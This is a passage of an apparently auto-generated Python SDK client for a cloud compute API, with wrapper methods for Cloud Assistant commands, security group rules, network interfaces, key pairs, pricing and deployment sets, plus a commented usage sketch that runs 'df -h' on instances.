name=None): api_request = APIRequest('CreateHpcCluster', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, 
"ClientToken": client_token, "Description": description, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def describe_snapshots_usage( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DescribeSnapshotsUsage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_spot_price_history( self, resource_owner_id=None, io_optimized=None, network_type=None, start_time=None, region_id=None, instance_type=None, offset=None, resource_owner_account=None, owner_account=None, end_time=None, os_type=None, owner_id=None, zone_id=None): api_request = APIRequest('DescribeSpotPriceHistory', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "IoOptimized": io_optimized, "NetworkType": network_type, "StartTime": start_time, "RegionId": region_id, "InstanceType": instance_type, "Offset": offset, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "EndTime": end_time, "OSType": os_type, "OwnerId": owner_id, "ZoneId": zone_id} return self._handle_request(api_request).result def stop_invocation( self, resource_owner_id=None, region_id=None, invoke_id=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None): api_request = APIRequest('StopInvocation', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "InvokeId": invoke_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def modify_command( self, resource_owner_id=None, working_dir=None, description=None, command_id=None, command_content=None, timeout=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('ModifyCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "WorkingDir": working_dir, "Description": description, "CommandId": command_id, "CommandContent": command_content, "Timeout": timeout, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def invoke_command( self, resource_owner_id=None, command_id=None, frequency=None, region_id=None, timed=None, resource_owner_account=None, owner_account=None, owner_id=None, list_of_instance_id=None, parameters=None): api_request = APIRequest('InvokeCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CommandId": command_id, "Frequency": frequency, "RegionId": region_id, "Timed": timed, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": list_of_instance_id, "Parameters": parameters} repeat_info = {"InstanceId": ('InstanceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return 
self._handle_request(api_request).result def describe_invocations( self, resource_owner_id=None, invoke_status=None, command_id=None, page_number=None, region_id=None, page_size=None, invoke_id=None, timed=None, command_name=None, resource_owner_account=None, owner_account=None, owner_id=None, command_type=None, instance_id=None): api_request = APIRequest('DescribeInvocations', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InvokeStatus": invoke_status, "CommandId": command_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InvokeId": invoke_id, "Timed": timed, "CommandName": command_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "CommandType": command_type, "InstanceId": instance_id} return self._handle_request(api_request).result def describe_invocation_results( self, resource_owner_id=None, command_id=None, page_number=None, region_id=None, page_size=None, invoke_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None, invoke_record_status=None, include_history=None): api_request = APIRequest('DescribeInvocationResults', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CommandId": command_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "InvokeId": invoke_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id, "InvokeRecordStatus": invoke_record_status, "IncludeHistory": include_history} return self._handle_request(api_request).result def describe_commands( self, resource_owner_id=None, description=None, type_=None, command_id=None, page_number=None, region_id=None, page_size=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None): api_request = APIRequest('DescribeCommands', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Description": description, "Type": type_, "CommandId": command_id, "PageNumber": page_number, "RegionId": region_id, "PageSize": page_size, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name} return self._handle_request(api_request).result def delete_command( self, resource_owner_id=None, command_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "CommandId": command_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_command( self, resource_owner_id=None, working_dir=None, description=None, type_=None, command_content=None, timeout=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, name=None, enable_parameter=None): api_request = APIRequest('CreateCommand', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "WorkingDir": working_dir, "Description": description, "Type": type_, "CommandContent": command_content, "Timeout": timeout, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "Name": name, "EnableParameter": enable_parameter} return self._handle_request(api_request).result 
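# --- Illustrative usage sketch (not part of the generated client code) ---
# Each wrapper above is a thin RPC binding: it builds an APIRequest, copies its
# keyword arguments into request parameters, validates any repeated ("list_of_")
# parameters with verify_params, and returns the parsed result of
# self._handle_request(...). A typical Cloud Assistant round trip using
# create_command / invoke_command / describe_invocation_results could look like
# the sketch below. The client construction (EcsClient, client_config) is an
# assumption for illustration only, and the result is assumed to be the parsed
# JSON response as a dict; adapt both to however this client class is
# instantiated and how results are consumed in your project.
#
#   import base64, time
#
#   client = EcsClient(client_config)  # hypothetical construction, see note above
#   cmd = client.create_command(
#       region_id="cn-hangzhou",
#       type_="RunShellScript",
#       name="disk-usage",
#       # the ECS API expects CommandContent to be Base64-encoded
#       command_content=base64.b64encode(b"df -h").decode(),
#   )
#   invoke = client.invoke_command(
#       region_id="cn-hangzhou",
#       command_id=cmd["CommandId"],
#       list_of_instance_id=["i-example1", "i-example2"],  # repeated parameter
#   )
#   time.sleep(5)  # give the command time to run before polling
#   results = client.describe_invocation_results(
#       region_id="cn-hangzhou",
#       invoke_id=invoke["InvokeId"],
#   )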
def modify_security_group_egress_rule( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, region_id=None, ipv6_dest_cidr_ip=None, ipv6_source_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, dest_group_id=None, owner_id=None, dest_group_owner_account=None, priority=None, dest_cidr_ip=None, dest_group_owner_id=None): api_request = APIRequest('ModifySecurityGroupEgressRule', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "RegionId": region_id, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "DestGroupId": dest_group_id, "OwnerId": owner_id, "DestGroupOwnerAccount": dest_group_owner_account, "Priority": priority, "DestCidrIp": dest_cidr_ip, "DestGroupOwnerId": dest_group_owner_id} return self._handle_request(api_request).result def modify_disk_charge_type( self, resource_owner_id=None, disk_charge_type=None, instance_id=None, auto_pay=None, resource_owner_account=None, region_id=None, client_token=None, owner_account=None, disk_ids=None, owner_id=None): api_request = APIRequest('ModifyDiskChargeType', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "DiskChargeType": disk_charge_type, "InstanceId": instance_id, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "ClientToken": client_token, "OwnerAccount": owner_account, "DiskIds": disk_ids, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_network_interface_attribute( self, resource_owner_id=None, list_of_security_group_id=None, description=None, region_id=None, network_interface_name=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None): api_request = APIRequest('ModifyNetworkInterfaceAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "SecurityGroupId": list_of_security_group_id, "Description": description, "RegionId": region_id, "NetworkInterfaceName": network_interface_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} repeat_info = {"SecurityGroupId": ('SecurityGroupId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def detach_network_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None, network_interface_id=None): api_request = APIRequest('DetachNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def describe_network_interfaces( self, resource_owner_id=None, service_managed=None, security_group_id=None, type_=None, 
page_number=None, resource_group_id=None, region_id=None, page_size=None, list_of_tag=None, network_interface_name=None, resource_owner_account=None, owner_account=None, owner_id=None, vswitch_id=None, list_of_private_ip_address=None, instance_id=None, vpc_id=None, primary_ip_address=None, list_of_network_interface_id=None): api_request = APIRequest('DescribeNetworkInterfaces', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ServiceManaged": service_managed, "SecurityGroupId": security_group_id, "Type": type_, "PageNumber": page_number, "ResourceGroupId": resource_group_id, "RegionId": region_id, "PageSize": page_size, "Tag": list_of_tag, "NetworkInterfaceName": network_interface_name, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "VSwitchId": vswitch_id, "PrivateIpAddress": list_of_private_ip_address, "InstanceId": instance_id, "VpcId": vpc_id, "PrimaryIpAddress": primary_ip_address, "NetworkInterfaceId": list_of_network_interface_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), "PrivateIpAddress": ('PrivateIpAddress', 'list', 'str', None), "NetworkInterfaceId": ('NetworkInterfaceId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_network_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, network_interface_id=None): api_request = APIRequest('DeleteNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def create_network_interface( self, resource_owner_id=None, client_token=None, security_group_id=None, description=None, business_type=None, resource_group_id=None, region_id=None, list_of_tag=None, network_interface_name=None, visible=None, resource_owner_account=None, owner_account=None, owner_id=None, vswitch_id=None, primary_ip_address=None): api_request = APIRequest('CreateNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "BusinessType": business_type, "ResourceGroupId": resource_group_id, "RegionId": region_id, "Tag": list_of_tag, "NetworkInterfaceName": network_interface_name, "Visible": visible, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "VSwitchId": vswitch_id, "PrimaryIpAddress": primary_ip_address} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Key', 'str', None, None), ('Value', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def attach_network_interface( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, owner_id=None, instance_id=None, network_interface_id=None): api_request = APIRequest('AttachNetworkInterface', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "OwnerId": owner_id, "InstanceId": instance_id, 
"NetworkInterfaceId": network_interface_id} return self._handle_request(api_request).result def describe_recommend_instance_type( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, channel=None, network_type=None, owner_id=None, operator=None, token=None, scene=None, region_id=None, instance_type=None, proxy_id=None): api_request = APIRequest('DescribeRecommendInstanceType', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "channel": channel, "NetworkType": network_type, "OwnerId": owner_id, "operator": operator, "token": token, "Scene": scene, "RegionId": region_id, "InstanceType": instance_type, "proxyId": proxy_id} return self._handle_request(api_request).result def modify_prepay_instance_spec( self, resource_owner_id=None, auto_pay=None, resource_owner_account=None, client_token=None, owner_account=None, end_time=None, owner_id=None, operator_type=None, system_disk_category=None, reboot_time=None, instance_id=None, region_id=None, migrate_across_zone=None, instance_type=None): api_request = APIRequest('ModifyPrepayInstanceSpec', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "AutoPay": auto_pay, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "EndTime": end_time, "OwnerId": owner_id, "OperatorType": operator_type, "SystemDisk.Category": system_disk_category, "RebootTime": reboot_time, "InstanceId": instance_id, "RegionId": region_id, "MigrateAcrossZone": migrate_across_zone, "InstanceType": instance_type} return self._handle_request(api_request).result def modify_instance_charge_type( self, resource_owner_id=None, period=None, dry_run=None, auto_pay=None, include_data_disks=None, resource_owner_account=None, client_token=None, owner_account=None, owner_id=None, period_unit=None, instance_ids=None, region_id=None, is_detail_fee=None, instance_charge_type=None): api_request = APIRequest('ModifyInstanceChargeType', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "DryRun": dry_run, "AutoPay": auto_pay, "IncludeDataDisks": include_data_disks, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "OwnerId": owner_id, "PeriodUnit": period_unit, "InstanceIds": instance_ids, "RegionId": region_id, "IsDetailFee": is_detail_fee, "InstanceChargeType": instance_charge_type} return self._handle_request(api_request).result def join_resource_group( self, resource_group_id=None, resource_owner_id=None, resource_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None, resource_type=None): api_request = APIRequest('JoinResourceGroup', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceGroupId": resource_group_id, "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id, "ResourceType": resource_type} return self._handle_request(api_request).result def modify_security_group_policy( self, resource_owner_id=None, region_id=None, client_token=None, resource_owner_account=None, owner_account=None, security_group_id=None, owner_id=None, inner_access_policy=None): api_request = APIRequest('ModifySecurityGroupPolicy', 'GET', 'http', 'RPC', 'query') api_request._params = { 
"ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ClientToken": client_token, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": security_group_id, "OwnerId": owner_id, "InnerAccessPolicy": inner_access_policy} return self._handle_request(api_request).result def describe_security_group_references( self, resource_owner_id=None, region_id=None, resource_owner_account=None, owner_account=None, list_of_security_group_id=None, owner_id=None): api_request = APIRequest('DescribeSecurityGroupReferences', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "RegionId": region_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "SecurityGroupId": list_of_security_group_id, "OwnerId": owner_id} repeat_info = {"SecurityGroupId": ('SecurityGroupId', 'list', 'str', None), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def detach_classic_link_vpc( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_id=None): api_request = APIRequest('DetachClassicLinkVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_classic_link_instances( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, vpc_id=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeClassicLinkInstances', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def attach_classic_link_vpc( self, resource_owner_id=None, instance_id=None, resource_owner_account=None, region_id=None, vpc_id=None, owner_id=None): api_request = APIRequest('AttachClassicLinkVpc', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "InstanceId": instance_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "VpcId": vpc_id, "OwnerId": owner_id} return self._handle_request(api_request).result def detach_instance_ram_role( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, ram_role_name=None, owner_id=None): api_request = APIRequest('DetachInstanceRamRole', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "RamRoleName": ram_role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_instance_ram_role( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, page_size=None, ram_role_name=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeInstanceRamRole', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "PageSize": page_size, "RamRoleName": ram_role_name, "OwnerId": owner_id, 
"PageNumber": page_number} return self._handle_request(api_request).result def attach_instance_ram_role( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, ram_role_name=None, owner_id=None): api_request = APIRequest('AttachInstanceRamRole', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "RamRoleName": ram_role_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_snapshot_package( self, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, page_size=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeSnapshotPackage', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PageSize": page_size, "OwnerId": owner_id, "PageNumber": page_number} return self._handle_request(api_request).result def modify_security_group_rule( self, nic_type=None, resource_owner_id=None, source_port_range=None, client_token=None, security_group_id=None, description=None, source_group_owner_id=None, source_group_owner_account=None, region_id=None, ipv6_source_cidr_ip=None, ipv6_dest_cidr_ip=None, policy=None, port_range=None, resource_owner_account=None, ip_protocol=None, owner_account=None, source_cidr_ip=None, owner_id=None, priority=None, dest_cidr_ip=None, source_group_id=None): api_request = APIRequest('ModifySecurityGroupRule', 'GET', 'http', 'RPC', 'query') api_request._params = { "NicType": nic_type, "ResourceOwnerId": resource_owner_id, "SourcePortRange": source_port_range, "ClientToken": client_token, "SecurityGroupId": security_group_id, "Description": description, "SourceGroupOwnerId": source_group_owner_id, "SourceGroupOwnerAccount": source_group_owner_account, "RegionId": region_id, "Ipv6SourceCidrIp": ipv6_source_cidr_ip, "Ipv6DestCidrIp": ipv6_dest_cidr_ip, "Policy": policy, "PortRange": port_range, "ResourceOwnerAccount": resource_owner_account, "IpProtocol": ip_protocol, "OwnerAccount": owner_account, "SourceCidrIp": source_cidr_ip, "OwnerId": owner_id, "Priority": priority, "DestCidrIp": dest_cidr_ip, "SourceGroupId": source_group_id} return self._handle_request(api_request).result def describe_snapshot_monitor_data( self, resource_owner_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, end_time=None, start_time=None, owner_id=None): api_request = APIRequest('DescribeSnapshotMonitorData', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "EndTime": end_time, "StartTime": start_time, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_renewal_price( self, resource_owner_id=None, resource_id=None, period=None, resource_owner_account=None, region_id=None, owner_account=None, price_unit=None, owner_id=None, resource_type=None): api_request = APIRequest('DescribeRenewalPrice', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceId": resource_id, "Period": period, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "PriceUnit": price_unit, "OwnerId": owner_id, 
"ResourceType": resource_type} return self._handle_request(api_request).result def describe_price( self, data_disk3_performance_level=None, data_disk3_size=None, resource_owner_id=None, image_id=None, data_disk3_category=None, io_optimized=None, internet_max_bandwidth_out=None, system_disk_category=None, system_disk_performance_level=None, data_disk4_category=None, data_disk4_performance_level=None, region_id=None, data_disk4_size=None, price_unit=None, instance_type=None, data_disk2_category=None, data_disk1_size=None, period=None, amount=None, resource_owner_account=None, owner_account=None, data_disk2_size=None, data_disk1_performance_level=None, owner_id=None, resource_type=None, data_disk1_category=None, data_disk2_performance_level=None, system_disk_size=None, internet_charge_type=None, instance_network_type=None): api_request = APIRequest('DescribePrice', 'GET', 'http', 'RPC', 'query') api_request._params = { "DataDisk.3.PerformanceLevel": data_disk3_performance_level, "DataDisk.3.Size": data_disk3_size, "ResourceOwnerId": resource_owner_id, "ImageId": image_id, "DataDisk.3.Category": data_disk3_category, "IoOptimized": io_optimized, "InternetMaxBandwidthOut": internet_max_bandwidth_out, "SystemDisk.Category": system_disk_category, "SystemDisk.PerformanceLevel": system_disk_performance_level, "DataDisk.4.Category": data_disk4_category, "DataDisk.4.PerformanceLevel": data_disk4_performance_level, "RegionId": region_id, "DataDisk.4.Size": data_disk4_size, "PriceUnit": price_unit, "InstanceType": instance_type, "DataDisk.2.Category": data_disk2_category, "DataDisk.1.Size": data_disk1_size, "Period": period, "Amount": amount, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "DataDisk.2.Size": data_disk2_size, "DataDisk.1.PerformanceLevel": data_disk1_performance_level, "OwnerId": owner_id, "ResourceType": resource_type, "DataDisk.1.Category": data_disk1_category, "DataDisk.2.PerformanceLevel": data_disk2_performance_level, "SystemDisk.Size": system_disk_size, "InternetChargeType": internet_charge_type, "InstanceNetworkType": instance_network_type} return self._handle_request(api_request).result def modify_deployment_set_attribute( self, deployment_set_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, description=None, deployment_set_name=None, owner_id=None): api_request = APIRequest('ModifyDeploymentSetAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "DeploymentSetId": deployment_set_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "Description": description, "DeploymentSetName": deployment_set_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_deployment_sets( self, resource_owner_id=None, resource_owner_account=None, owner_account=None, network_type=None, deployment_set_name=None, owner_id=None, page_number=None, deployment_set_ids=None, region_id=None, granularity=None, domain=None, page_size=None, strategy=None): api_request = APIRequest('DescribeDeploymentSets', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "OwnerAccount": owner_account, "NetworkType": network_type, "DeploymentSetName": deployment_set_name, "OwnerId": owner_id, "PageNumber": page_number, "DeploymentSetIds": deployment_set_ids, "RegionId": region_id, "Granularity": granularity, "Domain": domain, 
"PageSize": page_size, "Strategy": strategy} return self._handle_request(api_request).result def delete_deployment_set( self, deployment_set_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, owner_account=None, owner_id=None): api_request = APIRequest('DeleteDeploymentSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "DeploymentSetId": deployment_set_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "OwnerId": owner_id} return self._handle_request(api_request).result def create_deployment_set( self, resource_owner_id=None, resource_owner_account=None, client_token=None, owner_account=None, description=None, deployment_set_name=None, owner_id=None, region_id=None, on_unable_to_redeploy_failed_instance=None, granularity=None, domain=None, strategy=None): api_request = APIRequest('CreateDeploymentSet', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "ClientToken": client_token, "OwnerAccount": owner_account, "Description": description, "DeploymentSetName": deployment_set_name, "OwnerId": owner_id, "RegionId": region_id, "OnUnableToRedeployFailedInstance": on_unable_to_redeploy_failed_instance, "Granularity": granularity, "Domain": domain, "Strategy": strategy} return self._handle_request(api_request).result def import_key_pair( self, resource_owner_id=None, resource_owner_account=None, region_id=None, public_key_body=None, key_pair_name=None, owner_id=None): api_request = APIRequest('ImportKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "PublicKeyBody": public_key_body, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def detach_key_pair( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, key_pair_name=None, owner_id=None): api_request = APIRequest('DetachKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def describe_key_pairs( self, resource_group_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, key_pair_finger_print=None, page_size=None, key_pair_name=None, list_of_tag=None, owner_id=None, page_number=None): api_request = APIRequest('DescribeKeyPairs', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceGroupId": resource_group_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "KeyPairFingerPrint": key_pair_finger_print, "PageSize": page_size, "KeyPairName": key_pair_name, "Tag": list_of_tag, "OwnerId": owner_id, "PageNumber": page_number} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def delete_key_pairs( self, resource_owner_id=None, resource_owner_account=None, region_id=None, key_pair_names=None, owner_id=None): api_request = APIRequest('DeleteKeyPairs', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": 
resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "KeyPairNames": key_pair_names, "OwnerId": owner_id} return self._handle_request(api_request).result def create_key_pair( self, resource_group_id=None, resource_owner_id=None, resource_owner_account=None, region_id=None, key_pair_name=None, list_of_tag=None, owner_id=None): api_request = APIRequest('CreateKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceGroupId": resource_group_id, "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "KeyPairName": key_pair_name, "Tag": list_of_tag, "OwnerId": owner_id} repeat_info = {"Tag": ('Tag', 'list', 'dict', [('Value', 'str', None, None), ('Key', 'str', None, None), ]), } verify_params(api_request._params, repeat_info) return self._handle_request(api_request).result def attach_key_pair( self, resource_owner_id=None, resource_owner_account=None, region_id=None, instance_ids=None, key_pair_name=None, owner_id=None): api_request = APIRequest('AttachKeyPair', 'GET', 'http', 'RPC', 'query') api_request._params = { "ResourceOwnerId": resource_owner_id, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "InstanceIds": instance_ids, "KeyPairName": key_pair_name, "OwnerId": owner_id} return self._handle_request(api_request).result def modify_instance_auto_renew_attribute( self, duration=None, resource_owner_id=None, period_unit=None, instance_id=None, auto_renew=None, resource_owner_account=None, region_id=None, owner_account=None, renewal_status=None, owner_id=None): api_request = APIRequest('ModifyInstanceAutoRenewAttribute', 'GET', 'http', 'RPC', 'query') api_request._params = { "Duration": duration, "ResourceOwnerId": resource_owner_id, "PeriodUnit": period_unit, "InstanceId": instance_id, "AutoRenew": auto_renew, "ResourceOwnerAccount": resource_owner_account, "RegionId": region_id, "OwnerAccount": owner_account, "RenewalStatus": renewal_status, "OwnerId": owner_id} return 